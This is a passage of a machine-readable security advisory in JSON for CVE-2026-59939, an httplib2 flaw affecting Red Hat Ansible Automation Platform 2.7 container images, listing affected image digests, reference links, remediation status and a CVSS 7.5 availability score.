"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-59939"
},
{
"category": "external",
"summary": "RHBZ#2498212",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2498212"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-59939",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-59939"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-59939",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59939"
},
{
"category": "external",
"summary": "https://github.com/httplib2/httplib2/commit/87581ad6cf752fe3da2090c59058261d2d00a427",
"url": "https://github.com/httplib2/httplib2/commit/87581ad6cf752fe3da2090c59058261d2d00a427"
},
{
"category": "external",
"summary": "https://github.com/httplib2/httplib2/releases/tag/v0.32.0",
"url": "https://github.com/httplib2/httplib2/releases/tag/v0.32.0"
},
{
"category": "external",
"summary": "https://github.com/httplib2/httplib2/security/advisories/GHSA-j5g9-f88f-gfj3",
"url": "https://github.com/httplib2/httplib2/security/advisories/GHSA-j5g9-f88f-gfj3"
}
],
"release_date": "2026-07-08T19:34:05.150000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:38:09+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.7#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50340"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:1b29c33260a34d319581e3ad50436ba331ae2d1ff957c67184a253f084c86441_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:4a3de7687c2f4014016918f800f8edc3727f58e10f91516e38e5a5a1a6aa60d1_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:d0d43952f6566605feb98ecab51ebafb6a97f23fd7ecee8e1a88af6b495683f9_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-minimal-rhel9@sha256:fb1c1bdc24278bee7dfc433af498acac5fbc440ee919568254adb3ee9973f978_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:35caea9f2f5102fb4088201ba4a96a8c3eab4dfae0facf03ed2a58aeb0ce4549_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ee-supported-rhel9@sha256:bf55509be1d47b9f644c647f32bc3db8c618ae87a921aaac87003b420e0266d7_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6706769c9e9e74957c01991b8ebe5fbce625b39ba762af1ad9989f11df0b8cf6_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-proxy-rhel9@sha256:6c459fcb4f7ad8329dd17305d5370c022551e477dae49d14886d8293f13b1dc8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:b2979d79d95d2777e16c605ad777bd36d119a035bf10a94e8819cb0909ca5626_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9-operator@sha256:df86e008f172ea7f739740b110ab36e53b6120dd600ff86808f56a2a33e32602_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:76d0b913ad8e793136a5fff697eb39e13de1616bb10503a4158e857bc3264ef3_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/gateway-rhel9@sha256:8471b0b7b66309f346fe83e0a05ce968dcb9b55c2510e1f269c05b4aa87ed356_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:0cf7e473d3c463bf1498d2a1f3ba31c64085e06bd1dc0db844432c13325dcdc0_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9-operator@sha256:f3d880f509faaf37b20dbd2225d9868ec6e08b9998b7207734a9265f4cb33b95_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:6380adee2c6fa3c298d84db8c1a1f01f7dcab2bfd8b9476c127bdb4a67217c55_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-rhel9@sha256:b5400bb64dad7ce8aeed803b420c405bfe55cef08a28b9ac27e6c553c1bdf139_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:48479bf2f5bb4ddff65668c351521fdfbf95d662e54543854ec80f17a1295439_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/hub-web-rhel9@sha256:fc27fd49722a7a5b862928070b314f850b8d0e4385fec786d1914c0135e8e5fa_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:500c52d19ddfb4cd15e4ba0c94268250d5d83442c2c67381b3cb9bb7613c23d4_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-chatbot-rhel9@sha256:d2025c6e5fba7b87bbbbe71587a9332167e52301f4c55ee99ee02aa65cf9c404_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:5b3249e40859207e408f108ff90ba1eafb396f614ee031ab489ae48f1455d617_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9-operator@sha256:96ae0e2320d459611d674d18dec02c0eb31f6534407f6758004d8f74078b41ce_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:a9d59bb30f983980d8d59ef97f54dbf5427cfd1a24210aa5843be4ddf0f74143_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/lightspeed-rhel9@sha256:ce712ba0cc8e800babf1c1f013e95c4fc3d9ff6bc6f4230455567ba2974de890_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:470f289922f14644f0b9bda434d7001608818466703dab8de333bc02a4f79573_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-server-rhel9@sha256:d014d2eafa11bbff61ef871608ab3cd332602b9138e9505d40521a67a6162400_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:79d9bcdc9f2a45950eb3b511b7a3c2224592be0cf560af467887c70ca74a41ab_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/mcp-tools-rhel9@sha256:b0814ef140b9746de9c081bdb18067ea16de065ac2d7a984c2a9c59bb4357709_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:72c11674295ce5a7daa2c63dc7d4a63654912a5131391ccb2827223e5957ea05_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9-operator@sha256:78f3a98b9c8e028a461afd11e000f3f8a75d5f05f326bf0acd6c859dfd606ed8_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:551f489eccb8e97cd6f03de46f5fc8cc051fe4af717d8de272a3b06648cb771c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/metrics-service-rhel9@sha256:afc4a5e6ac70b810b36cb189ae7f38171de5323435fddaaed6529d755de1dd31_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:3f81691da61b84cf746d59516bb44ab6a5446742366d196591b3ba331832e913_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-rhel9-operator@sha256:8e6e40bde2eda8ccf3878d4831ffc39d1788830996fc990d657f0dad785810df_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:92f6621b8787535a9f961f9515bd56dcac2f1e5394d3f8d731896c0e48307849_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/platform-resource-runner-rhel9@sha256:a5800a87d81d83b9af7b8b01fb211e1bc7f3c26f5e0d047eaf3caa0aa1a0fe7c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:72ca7471ef1f86bea7d278c5d4b45131ccd267e2f331d3a6116eab92d3c41b60_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/receptor-rhel9@sha256:90879e56946584dc063eb98982681e6400b728c490d46d05cc6a0371dff33bcd_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:9d80aff1ca83a4db2be8ffac510831f6c4a6547d7b7a57f1422613a342ed5b2a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:fa0004bd6ec92544414d42a881421a41d8679fa9676bea2d641c6d1c10cad8e1_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:af38581c04caff4c124a2a5cc0dbbc29a35d59136a72149c88341d5130ec115c_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/aap-must-gather-rhel9@sha256:fc4564a19e737e01f69a8ffc7f609cfc00cbe78ecbd0202e21580798e0fad5b0_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:bad1cfd25c0a76284bca0d4e7b2997d1c19cf534a090c023818d7636c02b1d5a_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-builder-rhel9@sha256:d997409acf678f6741759e71663564fce7f9dbf36ba9c3efa4095514c365c8f8_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f66f5e6d6765f1e59a21da1f3ccb57c5c9d5a385b3a6ff359301e1dcbaf992d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-dev-tools-rhel9@sha256:f7d315beff91d5327f4c3ec3a5d95db462723d0c177023eee11b168381153a2b_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:5c57cc4b1591620c23e4d09d7452d560c344651f1c2a6559597b8a86901d7270_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/ansible-devspaces-rhel9@sha256:dd6396d101bf72b073914a91fa8621114060b83a6398dbaceacf60e550370058_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:5af18e0dfbddd146401125d1af25e02fbcd5c9c9c99f8b3463035ce8e8dfc88a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9-operator@sha256:d6ed231018aba445d42efaee38d156e3210029f914bcc7f41145c76063f179c6_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:49603d8eb1133ff25d77932418445b3399d56696b91575f404d54bd66f2abdf1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/controller-rhel9@sha256:cb6992dd9e3b8ff0cd5a96c7d72c2bd543a3ca388fbf87efec36aa4f1c170fe4_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:b08e64bb465fc4873e0822456a4b0bb3feb212f51f2629b751c5bf11b5952136_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-minimal-rhel9@sha256:f1a964f105f950060df297d60d49dadefadfc04a98e4196379e3c48590aabf5a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:214c8d370aff0f8260169e1092e630dd28d6b332da142d055c97e6ed906bd5d2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/de-supported-rhel9@sha256:603d5e810f3d05b36135d5155cea52d575dd6314354f42439c00c4d744a154ec_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:3a76538670407269fba45d8e9ba3c6b5067b6b19c4538fc837f3b167adf33de1_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9-operator@sha256:e07554775d76ffbfe312399cfa7469d444bcfb3486ff4d42ba64dc10d10c95b2_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:0e5b8ea19aaf599851b6d3c33f157fed70d6889c21f3b7dda42cc0aaee45e40a_arm64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-rhel9@sha256:665bc156c655ca4ed0021bffbabb1d2c7d0a5541582ea63287fcf7d2c3bbf89c_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4087572ac03600b6516526a78d5b4b093c943a6fd0a120c892d58df2a3118881_amd64",
"Red Hat Ansible Automation Platform 2.7:registry.redhat.io/ansible-automation-platform-27/eda-controller-ui-rhel9@sha256:4589dd9e21834c2d4f61712256d3e69b473fbe01c118c46e7c796c39715d3060_arm64",
